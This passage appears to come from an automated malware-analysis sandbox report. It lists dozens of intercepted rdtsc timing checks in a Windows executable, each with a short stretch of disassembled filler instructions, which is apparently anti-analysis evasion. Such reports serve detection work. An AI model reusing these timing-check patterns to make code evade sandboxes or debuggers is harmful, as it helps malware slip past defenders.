                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5099EF second address: 509A08 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c pushad 0x0000000d jnp 00007F3D90F37F16h 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509B81 second address: 509BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B59h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E117 second address: 50E11C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E38C second address: 50E390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E390 second address: 50E39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E520 second address: 50E524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E524 second address: 50E52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E52A second address: 50E530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E530 second address: 50E53A instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E67D second address: 50E681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515803 second address: 51580F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51580F second address: 515816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515816 second address: 51581B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514136 second address: 514145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3D90D93B46h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514145 second address: 514149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514558 second address: 514587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B54h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D90D93B53h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514587 second address: 514590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC4BD second address: 4BC506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+124814EEh] 0x0000002a sub dh, FFFFFFF2h 0x0000002d add eax, ebx 0x0000002f mov cx, 195Ch 0x00000033 nop 0x00000034 jng 00007F3D90D93B6Bh 0x0000003a push eax 0x0000003b push edx 0x0000003c jo 00007F3D90D93B46h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC506 second address: 4BC5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90F37F1Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F3D90F37F18h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edi, eax 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F3D90F37F18h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov di, ax 0x0000004b mov dword ptr [ebp+122D2ADBh], ecx 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 push eax 0x00000055 pop eax 0x00000056 jmp 00007F3D90F37F25h 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F3D90F37F1Bh 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514AC7 second address: 514ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514ACB second address: 514ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3D90F37F1Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514ADB second address: 514AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514AE8 second address: 514AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514AEC second address: 514B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90D93B46h 0x0000000e jmp 00007F3D90D93B53h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514B0D second address: 514B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515554 second address: 51555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51555A second address: 51558E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F3D90F37F18h 0x00000013 je 00007F3D90F37F1Eh 0x00000019 push ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51558E second address: 5155AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D90D93B56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5155AD second address: 5155B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517FE4 second address: 517FFA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90D93B46h 0x00000008 jp 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517FFA second address: 518004 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90F37F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518004 second address: 518029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B55h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3D90D93B46h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518029 second address: 518040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3D90F37F1Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518168 second address: 518185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518185 second address: 51819E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 jmp 00007F3D90F37F1Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51831A second address: 518338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3D90D93B55h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518662 second address: 51866A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E122 second address: 51E147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3D90D93B46h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F3D90D93B54h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E147 second address: 51E161 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90F37F18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F3D90F37F1Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E161 second address: 51E168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E9D1 second address: 51E9F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F3D90F37F18h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3D90F37F1Ch 0x00000018 pop edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E9F6 second address: 51E9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51EF81 second address: 51EF95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51EF95 second address: 51EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F231 second address: 51F236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F53F second address: 51F54B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90D93B46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FDEB second address: 51FE16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90F37F1Dh 0x00000008 jmp 00007F3D90F37F23h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE16 second address: 51FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F3D90D93B4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE2E second address: 51FE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE37 second address: 51FE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FE3D second address: 51FE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C8DB second address: 47C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524390 second address: 5243B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F3D90F37F16h 0x00000011 jmp 00007F3D90F37F27h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5243B8 second address: 5243D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3D90D93B46h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524523 second address: 524527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524800 second address: 52480F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F3D90D93B46h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AE9 second address: 524AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524C66 second address: 524C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524C6A second address: 524C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FE72 second address: 52FE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3D90D93B46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530004 second address: 530008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530008 second address: 530023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90D93B51h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530EC7 second address: 530F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F21h 0x00000007 jmp 00007F3D90F37F1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90F37F25h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D41 second address: 538D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3D90D93B54h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F3D90D93B4Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D6C second address: 538D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D72 second address: 538D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5387B5 second address: 5387CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5438C5 second address: 5438C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 472571 second address: 47258F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ch 0x00000009 jne 00007F3D90F37F1Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B95C second address: 54B962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABAD second address: 55ABB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABB8 second address: 55ABBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABBC second address: 55ABCC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABCC second address: 55ABE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ABE8 second address: 55ABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAAA second address: 55CAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAAF second address: 55CAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAB5 second address: 55CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CABD second address: 55CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3D90F37F1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562087 second address: 56209A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56740B second address: 567415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5675AE second address: 5675B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5675B4 second address: 5675DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90F37F16h 0x0000000e jmp 00007F3D90F37F28h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5675DA second address: 5675DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56775D second address: 567761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5678EB second address: 5678F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5678F2 second address: 5678FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567BE9 second address: 567BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F3D90D93B48h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567BFE second address: 567C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567C02 second address: 567C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568633 second address: 568654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F27h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568654 second address: 568681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B59h 0x00000008 jmp 00007F3D90D93B4Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568681 second address: 56868A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56868A second address: 568690 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB0C second address: 56DB10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB10 second address: 56DB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
